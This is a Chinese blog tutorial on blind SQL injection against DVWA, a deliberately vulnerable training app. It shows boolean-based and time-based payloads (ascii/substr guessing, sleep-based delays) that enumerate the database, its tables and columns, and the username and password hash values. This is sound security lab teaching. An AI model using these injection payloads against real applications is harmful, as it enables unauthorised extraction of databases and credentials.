DVWA之SQL注入（盲注）

RGB-Lab

已于 2024-05-19 23:20:57 修改

阅读量4.4k

点赞数 10

分类专栏：加密&安全文章标签： web安全安全性测试

于 2022-11-17 16:48:22 首次发布

本文链接：https://blog.youkuaiyun.com/maligebazi/article/details/127906943

版权

加密&安全专栏收录该内容

4 篇文章

订阅专栏

文章目录

方法一：基于布尔盲注
方法二：基于时间盲注

SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

手工盲注的过程，就像你与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是a啊？”，通过这种机械的询问，最终获得你想要的数据。

盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注，这里由于实验环境的限制，只演示基于布尔的盲注与基于时间的盲注。

判断是否存在注入，注入是字符型还是数字型
猜解当前数据库名
猜解数据库中的表名
猜解表中的字段名
猜解数据

盲注中常用的几个函数：

substr()
count()
ascii()
length()
left()
char_length()

方法一：基于布尔盲注

1.判断是否存在注入，注入类型

输入 1，输出 exists
在这里插入图片描述

1' or 1=1 # ，输出 exists
在这里插入图片描述

'1 or 1=1，
在这里插入图片描述

存在字符型的盲注。

2.猜数据库名

如果按照SQL 注入的方式执行：1' union select 1,database() #
在这里插入图片描述

并不能返回数据库名，先猜库名长度：
1' and length(database())=1 # ，显示不存在
直到 1' and length(database())=4 # ，显示存在。

说明库名长度为4
在这里插入图片描述

然后采用二分法猜数据库的名字。

输入1' and ascii(substr(database(),1,1))>88 #，显示存在，说明数据库名的第一个字符的ascii值大于88；
输入1' and ascii(substr(database(),1,1))<110 #，显示存在，说明数据库名的第一个字符的ascii值小于110；

重复上面的第一、第二步骤，直到猜到准确的数为止。我们通过试验知道了，这里第一个ASCII值为100，ASCII的表去找对应的字母，接下来按照第一、第二步骤继续第二个字母：

输入1' and ascii(substr(database(),2,1))>88 #

去找第二个字母，重复以上步骤，得到库名为dvwa

3.猜解数据库中的表名

先猜表的个数 1' and (select count(table_name) from information_schema.tables where table_schema=database())>5 # ，输出MISSING 不存在
接着 1' and (select count(table_name) from information_schema.tables where table_schema=database())>2 #，输出MISSING 不存在
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #，输出exists 存在

所以有两个表，我们先猜第一个表的长度

输入：1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>10 #，输出MISSING
使用二分法 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>5 #，输出 exists
直到—— 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #，输出 exists。

即第一个表名称字符长为9。

现在猜第一个表的第一个字母

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>88 #
直到—— 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 #，即对应的字母为g

然后我们再去猜其他的9个字母，为u、e、s、t、b、o、o、k，即为guestbook。

以及去猜第二个表

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>88 #

重复上面第一个表的步骤，得到第二个表为，users

4.猜列名

就直接拿 users表为例了。

先猜表中的字段数目1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8 #

（中间步骤省略了）数目为 8

猜user表各个名称，按照常规流程，从users表的第1个字段开始，对其猜解每一个组成字符，获取到完整的第1个字段名称…然后是第2/3/…/8个字段名称。当字段数目较多、名称较长的时候，若依然按照以上方式手工猜解，则会耗费比较多的时间。当时间有限的情况下，实际上有的字段可能并不太需要获取，字段的位置也暂且不作太多关注，首先获取几个包含键信息的字段，如：用户名、密码…

【猜想】数据库中可能保存的字段名称
用户名：username/user_name/uname/u_name/user/name/…
密码：password/pass_word/pwd/pass/…
所以说我们的命令就可以是

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 #，输出exists

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #，输出exists

所以我们可以知道 users表中有 user和password。还可以试试别的

5.猜表中的字段值

同样使用二分法来做，直接写最后一步了：

用户名的字段值：1' and length(substr((select user from users limit 0,1),1))=5 #，输出exists；说明user字段中第1个字段值的字符长度=5。
密码的字段值：1' and length(substr((select password from users limit 0,1),1))=32 #，输出exists；说明password字段中第1个字段值的字符长度=32（基本上这么长的密码位数可能是用md5的加密方式保存的）

然后再使用二分法猜解user字段的值：（用户名）

1' and ascii(substr((select user from users limit 0,1),1,1))=xxx #（第一个字符）
1' and ascii(substr((select user from users limit 0,1),2,1))=xxx #（第二个字符）

猜解password字段的值：（密码）

1' and ascii(substr((select password from users limit 0,1),1,1))=xxx #（第一个字符）

这里面有一个问题如果存储的是中文,怎么猜测中文，或者中英文都存在

方法二：基于时间盲注

1.判断是否存在注入，注入是字符型还是数字型

输入1' and sleep(5) #，感觉到明显延迟；
输入1 and sleep(5) #，没有延迟；

说明存在字符型的基于时间盲注。

2.猜解当前数据库名

（前面猜的方法都有，直接给结果了）：1' and if(length(database())=4,sleep(5),1) # 明显延迟，说明数据库名长度为4个字符。
然后二分法猜数据库名：1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)# 明显延迟，说明数据库第一个字符为 d。

重复上述步骤，可猜出数据库名为 dvwa

3.猜解数据库中的表名

首先猜解数据库中表的数量：1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# ，说明有两个表
然后猜第一个表名长度：1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #，说明第一个表名长度为9

采用二分法即可猜解出表名。

4.猜解表中的列名

还是先猜users表中的列的数量：1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# ，明显延迟，说明有8个列
然后猜第一个列名的长度：1’ and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明显延迟，说明第一个列名为7个字符

再用二分法猜解。。。